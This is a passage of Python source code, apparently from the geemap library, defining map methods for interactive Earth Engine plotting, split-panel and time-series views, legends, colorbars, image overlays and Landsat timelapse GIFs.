min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
if self.plot_widget is not None:
plot_widget = self.plot_widget
else:
plot_widget = widgets.Output(layout={"border": "1px solid black"})
plot_control = ipyleaflet.WidgetControl(
widget=plot_widget,
position=position,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
)
self.plot_widget = plot_widget
self.plot_control = plot_control
self.add_control(plot_control)
if max_width is None:
max_width = 500
if max_height is None:
max_height = 300
if (plot_type is None) and ("markers" not in kwargs.keys()):
kwargs["markers"] = "circle"
with plot_widget:
try:
fig = plt.figure(1, **kwargs)
if max_width is not None:
fig.layout.width = str(max_width) + "px"
if max_height is not None:
fig.layout.height = str(max_height) + "px"
plot_widget.clear_output(wait=True)
if not overlay:
plt.clear()
if plot_type is None:
if "marker" not in kwargs.keys():
kwargs["marker"] = "circle"
plt.plot(x, y, **kwargs)
elif plot_type == "bar":
plt.bar(x, y, **kwargs)
elif plot_type == "scatter":
plt.scatter(x, y, **kwargs)
elif plot_type == "hist":
plt.hist(y, **kwargs)
plt.show()
except Exception as e:
print("Failed to create plot.")
raise Exception(e)
def plot_demo(
self,
iterations=20,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""A demo of interactive plotting using random pixel coordinates.
Args:
iterations (int, optional): How many iterations to run for the demo. Defaults to 20.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
import numpy as np
if self.random_marker is not None:
self.remove_layer(self.random_marker)
image = ee.Image("LE7_TOA_5YEAR/1999_2003").select([0, 1, 2, 3, 4, 6])
self.addLayer(
image,
{"bands": ["B4", "B3", "B2"], "gamma": 1.4},
"LE7_TOA_5YEAR/1999_2003",
)
self.setCenter(-50.078877, 25.190030, 3)
band_names = image.bandNames().getInfo()
# band_count = len(band_names)
latitudes = np.random.uniform(30, 48, size=iterations)
longitudes = np.random.uniform(-121, -76, size=iterations)
marker = ipyleaflet.Marker(location=(0, 0))
self.random_marker = marker
self.add_layer(marker)
for i in range(iterations):
try:
coordinate = ee.Geometry.Point([longitudes[i], latitudes[i]])
dict_values = image.sample(coordinate).first().toDictionary().getInfo()
band_values = list(dict_values.values())
title = "{}/{}: Spectral signature at ({}, {})".format(
i + 1,
iterations,
round(latitudes[i], 2),
round(longitudes[i], 2),
)
marker.location = (latitudes[i], longitudes[i])
self.plot(
band_names,
band_values,
plot_type=plot_type,
overlay=overlay,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
title=title,
**kwargs,
)
time.sleep(0.3)
except Exception as e:
raise Exception(e)
def plot_raster(
self,
ee_object=None,
sample_scale=None,
plot_type=None,
overlay=False,
position="bottomright",
min_width=None,
max_width=None,
min_height=None,
max_height=None,
**kwargs,
):
"""Interactive plotting of Earth Engine data by clicking on the map.
Args:
ee_object (object, optional): The ee.Image or ee.ImageCollection to sample. Defaults to None.
sample_scale (float, optional): A nominal scale in meters of the projection to sample in. Defaults to None.
plot_type (str, optional): The plot type can be one of "None", "bar", "scatter" or "hist". Defaults to None.
overlay (bool, optional): Whether to overlay plotted lines on the figure. Defaults to False.
position (str, optional): Position of the control, can be ‘bottomleft’, ‘bottomright’, ‘topleft’, or ‘topright’. Defaults to 'bottomright'.
min_width (int, optional): Min width of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_width (int, optional): Max width of the widget (in pixels), if None it will respect the content size. Defaults to None.
min_height (int, optional): Min height of the widget (in pixels), if None it will respect the content size. Defaults to None.
max_height (int, optional): Max height of the widget (in pixels), if None it will respect the content size. Defaults to None.
"""
if self.plot_control is not None:
del self.plot_widget
if self.plot_control in self.controls:
self.remove_control(self.plot_control)
if self.random_marker is not None:
self.remove_layer(self.random_marker)
plot_widget = widgets.Output(layout={"border": "1px solid black"})
plot_control = ipyleaflet.WidgetControl(
widget=plot_widget,
position=position,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
)
self.plot_widget = plot_widget
self.plot_control = plot_control
self.add_control(plot_control)
self.default_style = {"cursor": "crosshair"}
msg = "The plot function can only be used on ee.Image or ee.ImageCollection with more than one band."
if (ee_object is None) and len(self.ee_raster_layers) > 0:
ee_object = self.ee_raster_layers[-1]
if isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
elif isinstance(ee_object, ee.ImageCollection):
ee_object = ee_object.mosaic()
elif not isinstance(ee_object, ee.Image):
print(msg)
return
if sample_scale is None:
sample_scale = self.getScale()
if max_width is None:
max_width = 500
band_names = ee_object.bandNames().getInfo()
coordinates = []
markers = []
marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.last_click = []
self.all_clicks = []
self.add_layer(marker_cluster)
def handle_interaction(**kwargs2):
latlon = kwargs2.get("coordinates")
if kwargs2.get("type") == "click":
try:
coordinates.append(latlon)
self.last_click = latlon
self.all_clicks = coordinates
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
self.default_style = {"cursor": "wait"}
xy = ee.Geometry.Point(latlon[::-1])
dict_values = (
ee_object.sample(xy, scale=sample_scale)
.first()
.toDictionary()
.getInfo()
)
band_values = list(dict_values.values())
self.plot(
band_names,
band_values,
plot_type=plot_type,
overlay=overlay,
min_width=min_width,
max_width=max_width,
min_height=min_height,
max_height=max_height,
**kwargs,
)
self.default_style = {"cursor": "crosshair"}
except Exception as e:
if self.plot_widget is not None:
with self.plot_widget:
self.plot_widget.clear_output()
print("No data for the clicked location.")
else:
print(e)
self.default_style = {"cursor": "crosshair"}
self.on_interaction(handle_interaction)
def add_maker_cluster(self, event="click", add_marker=True):
"""Captures user inputs and add markers to the map.
Args:
event (str, optional): [description]. Defaults to 'click'.
add_marker (bool, optional): If True, add markers to the map. Defaults to True.
Returns:
object: a marker cluster.
"""
coordinates = []
markers = []
marker_cluster = ipyleaflet.MarkerCluster(name="Marker Cluster")
self.last_click = []
self.all_clicks = []
if add_marker:
self.add_layer(marker_cluster)
def handle_interaction(**kwargs):
latlon = kwargs.get("coordinates")
if event == "click" and kwargs.get("type") == "click":
coordinates.append(latlon)
self.last_click = latlon
self.all_clicks = coordinates
if add_marker:
markers.append(ipyleaflet.Marker(location=latlon))
marker_cluster.markers = markers
elif kwargs.get("type") == "mousemove":
pass
# cursor style: https://www.w3schools.com/cssref/pr_class_cursor.asp
self.default_style = {"cursor": "crosshair"}
self.on_interaction(handle_interaction)
def set_control_visibility(
self, layerControl=True, fullscreenControl=True, latLngPopup=True
):
"""Sets the visibility of the controls on the map.
Args:
layerControl (bool, optional): Whether to show the control that allows the user to toggle layers on/off. Defaults to True.
fullscreenControl (bool, optional): Whether to show the control that allows the user to make the map full-screen. Defaults to True.
latLngPopup (bool, optional): Whether to show the control that pops up the Lat/lon when the user clicks on the map. Defaults to True.
"""
pass
setControlVisibility = set_control_visibility
def add_layer_control(self):
"""Adds the layer control to the map."""
pass
addLayerControl = add_layer_control
def split_map(self, left_layer="HYBRID", right_layer="ESRI"):
"""Adds split map.
Args:
left_layer (str, optional): The layer tile layer. Defaults to 'HYBRID'.
right_layer (str, optional): The right tile layer. Defaults to 'ESRI'.
"""
try:
controls = self.controls
layers = self.layers
self.clear_controls()
self.add_control(ipyleaflet.ZoomControl())
self.add_control(ipyleaflet.FullScreenControl())
if left_layer in basemap_tiles.keys():
left_layer = basemap_tiles[left_layer]
if right_layer in basemap_tiles.keys():
right_layer = basemap_tiles[right_layer]
control = ipyleaflet.SplitMapControl(
left_layer=left_layer, right_layer=right_layer
)
close_button = widgets.ToggleButton(
value=False,
tooltip="Close split-panel map",
icon="times",
layout=widgets.Layout(
height="28px", width="28px", padding="0px 0px 0px 4px"
),
)
def close_btn_click(change):
if change["new"]:
self.controls = controls
self.layers = layers[:-1]
self.add_layer(layers[-1])
close_button.observe(close_btn_click, "value")
close_control = ipyleaflet.WidgetControl(
widget=close_button, position="bottomright"
)
self.add_control(control)
self.add_control(close_control)
except Exception as e:
print("The provided layers are invalid!")
raise ValueError(e)
def ts_inspector(
self,
left_ts,
right_ts,
left_names,
right_names,
left_vis={},
right_vis={},
):
"""Creates a split-panel map for inspecting timeseries images.
Args:
left_ts (object): An ee.ImageCollection to show on the left panel.
right_ts (object): An ee.ImageCollection to show on the right panel.
left_names (list): A list of names to show under the left dropdown.
right_names (list): A list of names to show under the right dropdown.
left_vis (dict, optional): Visualization parameters for the left layer. Defaults to {}.
right_vis (dict, optional): Visualization parameters for the right layer. Defaults to {}.
"""
left_count = int(left_ts.size().getInfo())
right_count = int(right_ts.size().getInfo())
if left_count != len(left_names):
print(
"The number of images in left_ts must match the number of layer names in left_names."
)
return
if right_count != len(right_names):
print(
"The number of images in right_ts must match the number of layer names in right_names."
)
return
left_layer = ipyleaflet.TileLayer(
url="https://mt1.google.com/vt/lyrs=m&x={x}&y={y}&z={z}",
attribution="Google",
name="Google Maps",
)
right_layer = ipyleaflet.TileLayer(
url="https://mt1.google.com/vt/lyrs=m&x={x}&y={y}&z={z}",
attribution="Google",
name="Google Maps",
)
self.clear_controls()
left_dropdown = widgets.Dropdown(options=left_names, value=None)
right_dropdown = widgets.Dropdown(options=right_names, value=None)
left_dropdown.layout.max_width = "130px"
right_dropdown.layout.max_width = "130px"
left_control = ipyleaflet.WidgetControl(
widget=left_dropdown, position="topleft"
)
right_control = ipyleaflet.WidgetControl(
widget=right_dropdown, position="topright"
)
self.add_control(control=left_control)
self.add_control(control=right_control)
self.add_control(ipyleaflet.ZoomControl(position="topleft"))
self.add_control(ipyleaflet.ScaleControl(position="bottomleft"))
self.add_control(ipyleaflet.FullScreenControl())
def left_dropdown_change(change):
left_dropdown_index = left_dropdown.index
if left_dropdown_index is not None and left_dropdown_index >= 0:
try:
if isinstance(left_ts, ee.ImageCollection):
left_image = left_ts.toList(left_ts.size()).get(
left_dropdown_index
)
elif isinstance(left_ts, ee.List):
left_image = left_ts.get(left_dropdown_index)
else:
print("The left_ts argument must be an ImageCollection.")
return
if isinstance(left_image, ee.ImageCollection):
left_image = ee.Image(left_image.mosaic())
elif isinstance(left_image, ee.Image):
pass
else:
left_image = ee.Image(left_image)
left_image = ee_tile_layer(
left_image, left_vis, left_names[left_dropdown_index]
)
left_layer.url = left_image.url
except Exception as e:
print(e)
return
left_dropdown.observe(left_dropdown_change, names="value")
def right_dropdown_change(change):
right_dropdown_index = right_dropdown.index
if right_dropdown_index is not None and right_dropdown_index >= 0:
try:
if isinstance(right_ts, ee.ImageCollection):
right_image = right_ts.toList(left_ts.size()).get(
right_dropdown_index
)
elif isinstance(right_ts, ee.List):
right_image = right_ts.get(right_dropdown_index)
else:
print("The left_ts argument must be an ImageCollection.")
return
if isinstance(right_image, ee.ImageCollection):
right_image = ee.Image(right_image.mosaic())
elif isinstance(right_image, ee.Image):
pass
else:
right_image = ee.Image(right_image)
right_image = ee_tile_layer(
right_image,
right_vis,
right_names[right_dropdown_index],
)
right_layer.url = right_image.url
except Exception as e:
print(e)
return
right_dropdown.observe(right_dropdown_change, names="value")
try:
split_control = ipyleaflet.SplitMapControl(
left_layer=left_layer, right_layer=right_layer
)
self.add_control(split_control)
except Exception as e:
raise Exception(e)
def basemap_demo(self):
"""A demo for using geemap basemaps."""
dropdown = widgets.Dropdown(
options=list(basemap_tiles.keys()),
value="HYBRID",
description="Basemaps",
)
def on_click(change):
basemap_name = change["new"]
old_basemap = self.layers[-1]
self.substitute_layer(old_basemap, basemap_tiles[basemap_name])
dropdown.observe(on_click, "value")
basemap_control = ipyleaflet.WidgetControl(widget=dropdown, position="topright")
self.add_control(basemap_control)
def add_legend(
self,
legend_title="Legend",
legend_dict=None,
legend_keys=None,
legend_colors=None,
position="bottomright",
builtin_legend=None,
layer_name=None,
**kwargs,
):
"""Adds a customized basemap to the map.
Args:
legend_title (str, optional): Title of the legend. Defaults to 'Legend'.
legend_dict (dict, optional): A dictionary containing legend items as keys and color as values. If provided, legend_keys and legend_colors will be ignored. Defaults to None.
legend_keys (list, optional): A list of legend keys. Defaults to None.
legend_colors (list, optional): A list of legend colors. Defaults to None.
position (str, optional): Position of the legend. Defaults to 'bottomright'.
builtin_legend (str, optional): Name of the builtin legend to add to the map. Defaults to None.
layer_name (str, optional): Layer name of the legend to be associated with. Defaults to None.
"""
import pkg_resources
from IPython.display import display
pkg_dir = os.path.dirname(
pkg_resources.resource_filename("geemap", "geemap.py")
)
legend_template = os.path.join(pkg_dir, "data/template/legend.html")
if "min_width" not in kwargs.keys():
min_width = None
if "max_width" not in kwargs.keys():
max_width = None
else:
max_width = kwargs["max_width"]
if "min_height" not in kwargs.keys():
min_height = None
else:
min_height = kwargs["min_height"]
if "max_height" not in kwargs.keys():
max_height = None
else:
max_height = kwargs["max_height"]
if "height" not in kwargs.keys():
height = None
else:
height = kwargs["height"]
if "width" not in kwargs.keys():
width = None
else:
width = kwargs["width"]
if width is None:
max_width = "300px"
if height is None:
max_height = "400px"
if not os.path.exists(legend_template):
print("The legend template does not exist.")
return
if legend_keys is not None:
if not isinstance(legend_keys, list):
print("The legend keys must be a list.")
return
else:
legend_keys = ["One", "Two", "Three", "Four", "etc"]
if legend_colors is not None:
if not isinstance(legend_colors, list):
print("The legend colors must be a list.")
return
elif all(isinstance(item, tuple) for item in legend_colors):
try:
legend_colors = [rgb_to_hex(x) for x in legend_colors]
except Exception as e:
print(e)
elif all(
(item.startswith("#") and len(item) == 7) for item in legend_colors
):
pass
elif all((len(item) == 6) for item in legend_colors):
pass
else:
print("The legend colors must be a list of tuples.")
return
else:
legend_colors = [
"#8DD3C7",
"#FFFFB3",
"#BEBADA",
"#FB8072",
"#80B1D3",
]
if len(legend_keys) != len(legend_colors):
print("The legend keys and values must be the same length.")
return
allowed_builtin_legends = builtin_legends.keys()
if builtin_legend is not None:
if builtin_legend not in allowed_builtin_legends:
print(
"The builtin legend must be one of the following: {}".format(
", ".join(allowed_builtin_legends)
)
)
return
else:
legend_dict = builtin_legends[builtin_legend]
legend_keys = list(legend_dict.keys())
legend_colors = list(legend_dict.values())
if legend_dict is not None:
if not isinstance(legend_dict, dict):
print("The legend dict must be a dictionary.")
return
else:
legend_keys = list(legend_dict.keys())
legend_colors = list(legend_dict.values())
if all(isinstance(item, tuple) for item in legend_colors):
try:
legend_colors = [rgb_to_hex(x) for x in legend_colors]
except Exception as e:
print(e)
allowed_positions = [
"topleft",
"topright",
"bottomleft",
"bottomright",
]
if position not in allowed_positions:
print(
"The position must be one of the following: {}".format(
", ".join(allowed_positions)
)
)
return
header = []
content = []
footer = []
with open(legend_template) as f:
lines = f.readlines()
lines[3] = lines[3].replace("Legend", legend_title)
header = lines[:6]
footer = lines[11:]
for index, key in enumerate(legend_keys):
color = legend_colors[index]
if not color.startswith("#"):
color = "#" + color
item = " <li><span style='background:{};'></span>{}</li>\n".format(
color, key
)
content.append(item)
legend_html = header + content + footer
legend_text = "".join(legend_html)
try:
legend_output_widget = widgets.Output(
layout={
# "border": "1px solid black",
"max_width": max_width,
"min_width": min_width,
"max_height": max_height,
"min_height": min_height,
"height": height,
"width": width,
"overflow": "scroll",
}
)
legend_control = ipyleaflet.WidgetControl(
widget=legend_output_widget, position=position
)
legend_widget = widgets.HTML(value=legend_text)
with legend_output_widget:
display(legend_widget)
self.legend_widget = legend_output_widget
self.legend_control = legend_control
self.add_control(legend_control)
if layer_name in self.ee_layer_names:
self.ee_layer_dict[layer_name]["legend"] = legend_control
except Exception as e:
raise Exception(e)
def add_colorbar(
self,
vis_params=None,
cmap="gray",
discrete=False,
label=None,
orientation="horizontal",
position="bottomright",
transparent_bg=False,
layer_name=None,
**kwargs,
):
"""Add a matplotlib colorbar to the map
Args:
vis_params (dict): Visualization parameters as a dictionary. See https://developers.google.com/earth-engine/guides/image_visualization for options.
cmap (str, optional): Matplotlib colormap. Defaults to "gray". See https://matplotlib.org/3.3.4/tutorials/colors/colormaps.html#sphx-glr-tutorials-colors-colormaps-py for options.
discrete (bool, optional): Whether to create a discrete colorbar. Defaults to False.
label (str, optional): Label for the colorbar. Defaults to None.
orientation (str, optional): Orientation of the colorbar, such as "vertical" and "horizontal". Defaults to "horizontal".
position (str, optional): Position of the colorbar on the map. It can be one of: topleft, topright, bottomleft, and bottomright. Defaults to "bottomright".
transparent_bg (bool, optional): Whether to use transparent background. Defaults to False.
layer_name (str, optional): The layer name associated with the colorbar. Defaults to None.
Raises:
TypeError: If the vis_params is not a dictionary.
ValueError: If the orientation is not either horizontal or vertical.
ValueError: If the provided min value is not scalar type.
ValueError: If the provided max value is not scalar type.
ValueError: If the provided opacity value is not scalar type.
ValueError: If cmap or palette is not provided.
"""
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
if isinstance(vis_params, list):
vis_params = {"palette": vis_params}
elif isinstance(vis_params, tuple):
vis_params = {"palette": list(vis_params)}
elif vis_params is None:
vis_params = {}
if "colors" in kwargs and isinstance(kwargs["colors"], list):
vis_params["palette"] = kwargs["colors"]
if "colors" in kwargs and isinstance(kwargs["colors"], tuple):
vis_params["palette"] = list(kwargs["colors"])
if "vmin" in kwargs:
vis_params["min"] = kwargs["vmin"]
del kwargs["vmin"]
if "vmax" in kwargs:
vis_params["max"] = kwargs["vmax"]
del kwargs["vmax"]
if "caption" in kwargs:
label = kwargs["caption"]
del kwargs["caption"]
if not isinstance(vis_params, dict):
raise TypeError("The vis_params must be a dictionary.")
if orientation not in ["horizontal", "vertical"]:
raise ValueError("The orientation must be either horizontal or vertical.")
if orientation == "horizontal":
width, height = 6.0, 0.4
else:
width, height = 0.4, 4.0
if "width" in kwargs:
width = kwargs["width"]
kwargs.pop("width")
if "height" in kwargs:
height = kwargs["height"]
kwargs.pop("height")
vis_keys = list(vis_params.keys())
if "min" in vis_params:
vmin = vis_params["min"]
if type(vmin) not in (int, float):
raise ValueError("The provided min value must be scalar type.")
else:
vmin = 0
if "max" in vis_params:
vmax = vis_params["max"]
if type(vmax) not in (int, float):
raise ValueError("The provided max value must be scalar type.")
else:
vmax = 1
if "opacity" in vis_params:
alpha = vis_params["opacity"]
if type(alpha) not in (int, float):
raise ValueError("The provided opacity value must be type scalar.")
elif "alpha" in kwargs:
alpha = kwargs["alpha"]
else:
alpha = 1
if cmap is not None:
cmap = mpl.pyplot.get_cmap(cmap)
norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)
if "palette" in vis_keys:
hexcodes = to_hex_colors(vis_params["palette"])
if discrete:
cmap = mpl.colors.ListedColormap(hexcodes)
vals = np.linspace(vmin, vmax, cmap.N + 1)
norm = mpl.colors.BoundaryNorm(vals, cmap.N)
else:
cmap = mpl.colors.LinearSegmentedColormap.from_list(
"custom", hexcodes, N=256
)
norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)
elif cmap is not None:
cmap = mpl.pyplot.get_cmap(cmap)
norm = mpl.colors.Normalize(vmin=vmin, vmax=vmax)
else:
raise ValueError(
'cmap keyword or "palette" key in vis_params must be provided.'
)
_, ax = plt.subplots(figsize=(width, height))
cb = mpl.colorbar.ColorbarBase(
ax, norm=norm, alpha=alpha, cmap=cmap, orientation=orientation, **kwargs
)
if "bands" in vis_keys:
cb.set_label(vis_params["bands"])
elif label is not None:
cb.set_label(label)
output = widgets.Output()
colormap_ctrl = ipyleaflet.WidgetControl(
widget=output,
position=position,
transparent_bg=transparent_bg,
)
with output:
output.clear_output()
plt.show()
self.colorbar = colormap_ctrl
if layer_name in self.ee_layer_names:
if "colorbar" in self.ee_layer_dict[layer_name]:
self.remove_control(self.ee_layer_dict[layer_name]["colorbar"])
self.ee_layer_dict[layer_name]["colorbar"] = colormap_ctrl
self.add_control(colormap_ctrl)
def add_colorbar_branca(
self,
colors,
vmin=0,
vmax=1.0,
index=None,
caption="",
categorical=False,
step=None,
height="45px",
transparent_bg=False,
position="bottomright",
layer_name=None,
**kwargs,
):
"""Add a branca colorbar to the map.
Args:
colors (list): The set of colors to be used for interpolation. Colors can be provided in the form: * tuples of RGBA ints between 0 and 255 (e.g: (255, 255, 0) or (255, 255, 0, 255)) * tuples of RGBA floats between 0. and 1. (e.g: (1.,1.,0.) or (1., 1., 0., 1.)) * HTML-like string (e.g: “#ffff00) * a color name or shortcut (e.g: “y” or “yellow”)
vmin (int, optional): The minimal value for the colormap. Values lower than vmin will be bound directly to colors[0].. Defaults to 0.
vmax (float, optional): The maximal value for the colormap. Values higher than vmax will be bound directly to colors[-1]. Defaults to 1.0.
index (list, optional):The values corresponding to each color. It has to be sorted, and have the same length as colors. If None, a regular grid between vmin and vmax is created.. Defaults to None.
caption (str, optional): The caption for the colormap. Defaults to "".
categorical (bool, optional): Whether or not to create a categorical colormap. Defaults to False.
step (int, optional): The step to split the LinearColormap into a StepColormap. Defaults to None.
height (str, optional): The height of the colormap widget. Defaults to "45px".
transparent_bg (bool, optional): Whether to use transparent background for the colormap widget. Defaults to True.
position (str, optional): The position for the colormap widget. Defaults to "bottomright".
layer_name (str, optional): Layer name of the colorbar to be associated with. Defaults to None.
"""
from box import Box
from branca.colormap import LinearColormap
output = widgets.Output()
output.layout.height = height
if "width" in kwargs.keys():
output.layout.width = kwargs["width"]
if isinstance(colors, Box):
try:
colors = list(colors["default"])
except Exception as e:
print("The provided color list is invalid.")
raise Exception(e)
if all(len(color) == 6 for color in colors):
colors = ["#" + color for color in colors]
colormap = LinearColormap(
colors=colors, index=index, vmin=vmin, vmax=vmax, caption=caption
)
if categorical:
if step is not None:
colormap = colormap.to_step(step)
elif index is not None:
colormap = colormap.to_step(len(index) - 1)
else:
colormap = colormap.to_step(3)
colormap_ctrl = ipyleaflet.WidgetControl(
widget=output,
position=position,
transparent_bg=transparent_bg,
**kwargs,
)
with output:
output.clear_output()
display(colormap)
self.colorbar = colormap_ctrl
self.add_control(colormap_ctrl)
if layer_name in self.ee_layer_names:
self.ee_layer_dict[layer_name]["colorbar"] = colormap_ctrl
def remove_colorbar(self):
"""Remove colorbar from the map."""
if self.colorbar is not None:
self.remove_control(self.colorbar)
def image_overlay(self, url, bounds, name):
"""Overlays an image from the Internet or locally on the map.
Args:
url (str): http URL or local file path to the image.
bounds (tuple): bounding box of the image in the format of (lower_left(lat, lon), upper_right(lat, lon)), such as ((13, -130), (32, -100)).
name (str): name of the layer to show on the layer control.
"""
from base64 import b64encode
from io import BytesIO
from PIL import Image, ImageSequence
try:
if not url.startswith("http"):
if not os.path.exists(url):
print("The provided file does not exist.")
return
ext = os.path.splitext(url)[1][1:] # file extension
image = Image.open(url)
f = BytesIO()
if ext.lower() == "gif":
frames = []
# Loop over each frame in the animated image
for frame in ImageSequence.Iterator(image):
frame = frame.convert("RGBA")
b = BytesIO()
frame.save(b, format="gif")
frame = Image.open(b)
frames.append(frame)
frames[0].save(
f,
format="GIF",
save_all=True,
append_images=frames[1:],
loop=0,
)
else:
image.save(f, ext)
data = b64encode(f.getvalue())
data = data.decode("ascii")
url = "data:image/{};base64,".format(ext) + data
img = ipyleaflet.ImageOverlay(url=url, bounds=bounds, name=name)
self.add_layer(img)
except Exception as e:
print(e)
def video_overlay(self, url, bounds, name):
"""Overlays a video from the Internet on the map.
Args:
url (str): http URL of the video, such as "https://www.mapbox.com/bites/00188/patricia_nasa.webm"
bounds (tuple): bounding box of the video in the format of (lower_left(lat, lon), upper_right(lat, lon)), such as ((13, -130), (32, -100)).
name (str): name of the layer to show on the layer control.
"""
try:
video = ipyleaflet.VideoOverlay(url=url, bounds=bounds, name=name)
self.add_layer(video)
except Exception as e:
print(e)
def add_landsat_ts_gif(
self,
layer_name="Timelapse",
roi=None,
label=None,
start_year=1984,
end_year=2019,
start_date="06-10",
end_date="09-20",
bands=["NIR", "Red", "Green"],
vis_params=None,
dimensions=768,
frames_per_second=10,
font_size=30,
font_color="white",
add_progress_bar=True,
progress_bar_color="white",
progress_bar_height=5,
out_gif=None,
download=False,
apply_fmask=True,
nd_bands=None,
nd_threshold=0,
nd_palette=["black", "blue"],
):
"""Adds a Landsat timelapse to the map.
Args:
layer_name (str, optional): Layer name to show under the layer control. Defaults to 'Timelapse'.
roi (object, optional): Region of interest to create the timelapse. Defaults to None.
label (str, optional): A label to shown on the GIF, such as place name. Defaults to None.
start_year (int, optional): Starting year for the timelapse. Defaults to 1984.
end_year (int, optional): Ending year for the timelapse. Defaults to 2019.
start_date (str, optional): Starting date (month-day) each year for filtering ImageCollection. Defaults to '06-10'.
end_date (str, optional): Ending date (month-day) each year for filtering ImageCollection. Defaults to '09-20'.
bands (list, optional): Three bands selected from ['Blue', 'Green', 'Red', 'NIR', 'SWIR1', 'SWIR2', 'pixel_qa']. Defaults to ['NIR', 'Red', 'Green'].
vis_params (dict, optional): Visualization parameters. Defaults to None.
dimensions (int, optional): a number or pair of numbers in format WIDTHxHEIGHT) Maximum dimensions of the thumbnail to render, in pixels. If only one number is passed, it is used as the maximum, and the other dimension is computed by proportional scaling. Defaults to 768.
frames_per_second (int, optional): Animation speed. Defaults to 10.
font_size (int, optional): Font size of the animated text and label. Defaults to 30.
font_color (str, optional): Font color of the animated text and label. Defaults to 'black'.
add_progress_bar (bool, optional): Whether to add a progress bar at the bottom of the GIF. Defaults to True.
progress_bar_color (str, optional): Color for the progress bar. Defaults to 'white'.
progress_bar_height (int, optional): Height of the progress bar. Defaults to 5.
out_gif (str, optional): File path to the output animated GIF. Defaults to None.
download (bool, optional): Whether to download the gif. Defaults to False.
apply_fmask (bool, optional): Whether to apply Fmask (Function of mask) for automated clouds, cloud shadows, snow, and water masking.
nd_bands (list, optional): A list of names specifying the bands to use, e.g., ['Green', 'SWIR1']. The normalized difference is computed as (first − second) / (first + second). Note that negative input values are forced to 0 so that the result is confined to the range (-1, 1).
nd_threshold (float, optional): The threshold for extacting pixels from the normalized difference band.
nd_palette (str, optional): The color palette to use for displaying the normalized difference band.
"""
try:
if roi is None:
if self.draw_last_feature is not None:
feature = self.draw_last_feature
roi = feature.geometry()
else:
roi = ee.Geometry.Polygon(
[
[
[-115.471773, 35.892718],
[-115.471773, 36.409454],
[-114.271283, 36.409454],
[-114.271283, 35.892718],
[-115.471773, 35.892718],
]
],
None,
False,
)
elif isinstance(roi, ee.Feature) or isinstance(roi, ee.FeatureCollection):
roi = roi.geometry()
elif isinstance(roi, ee.Geometry):
pass
else:
print("The provided roi is invalid. It must be an ee.Geometry")
return
geojson = ee_to_geojson(roi)
bounds = minimum_bounding_box(geojson)
geojson = adjust_longitude(geojson)
roi = ee.Geometry(geojson)
in_gif = landsat_ts_gif(
roi=roi,
out_gif=out_gif,
start_year=start_year,
end_year=end_year,
start_date=start_date,
end_date=end_date,
bands=bands,
vis_params=vis_params,
dimensions=dimensions,
frames_per_second=frames_per_second,
apply_fmask=apply_fmask,
nd_bands=nd_bands,
nd_threshold=nd_threshold,
nd_palette=nd_palette,
)
in_nd_gif = in_gif.replace(".gif", "_nd.gif")
print("Adding animated text to GIF ...")
add_text_to_gif(
in_gif,
in_gif,
xy=("2%", "2%"),
text_sequence=start_year,
font_size=font_size,
font_color=font_color,
duration=int(1000 / frames_per_second),
add_progress_bar=add_progress_bar,
progress_bar_color=progress_bar_color,
progress_bar_height=progress_bar_height,
)
if nd_bands is not None:
add_text_to_gif(
in_nd_gif,
in_nd_gif,
xy=("2%", "2%"),
text_sequence=start_year,
font_size=font_size,
font_color=font_color,
duration=int(1000 / frames_per_second),
add_progress_bar=add_progress_bar,
progress_bar_color=progress_bar_color,
progress_bar_height=progress_bar_height,
)
if label is not None:
add_text_to_gif(
in_gif,
in_gif,
xy=("2%", "90%"),
text_sequence=label,
font_size=font_size,
font_color=font_color,
duration=int(1000 / frames_per_second),
add_progress_bar=add_progress_bar,
progress_bar_color=progress_bar_color,
progress_bar_height=progress_bar_height,
)
# if nd_bands is not None:
# add_text_to_gif(in_nd_gif, in_nd_gif, xy=('2%', '90%'), text_sequence=label,
# font_size=font_size, font_color=font_color, duration=int(1000 / frames_per_second), add_progress_bar=add_progress_bar, progress_bar_color=progress_bar_color, progress_bar_height=progress_bar_height)
if is_tool("ffmpeg"):
reduce_gif_size(in_gif)
if nd_bands is not None:
reduce_gif_size(in_nd_gif)
print("Adding GIF to the map ...")
self.image_overlay(url=in_gif, bounds=bounds, name=layer_name)
if nd_bands is not None:
self.image_overlay(
url=in_nd_gif, bounds=bounds, name=layer_name + " ND"
)
print("The timelapse has been added to the map.")
if download:
link = create_download_link(
in_gif,
title="Click here to download the Landsat timelapse: ",
)
display(link)
if nd_bands is not None:
link2 = create_download_link(
in_nd_gif,
title="Click here to download the Normalized Difference Index timelapse: ",
)
display(link2)
except Exception as e:
raise Exception(e)
def to_html(
self,
outfile,
title="My Map",
width="100%",
height="880px",
add_layer_control=True,
):
"""Saves the map as a HTML file.
Args:
outfile (str): The output file path to the HTML file.
title (str, optional): The title of the HTML file. Defaults to 'My Map'.
width (str, optional): The width of the map in pixels or percentage. Defaults to '100%'.
height (str, optional): The height of the map in pixels. Defaults to '880px'.
add_layer_control (bool, optional): Whether to add the LayersControl. Defaults to True.
"""
try:
if not outfile.endswith(".html"):
print("The output file must end with .html")
return
out_dir = os.path.dirname(outfile)
if not os.path.exists(out_dir):
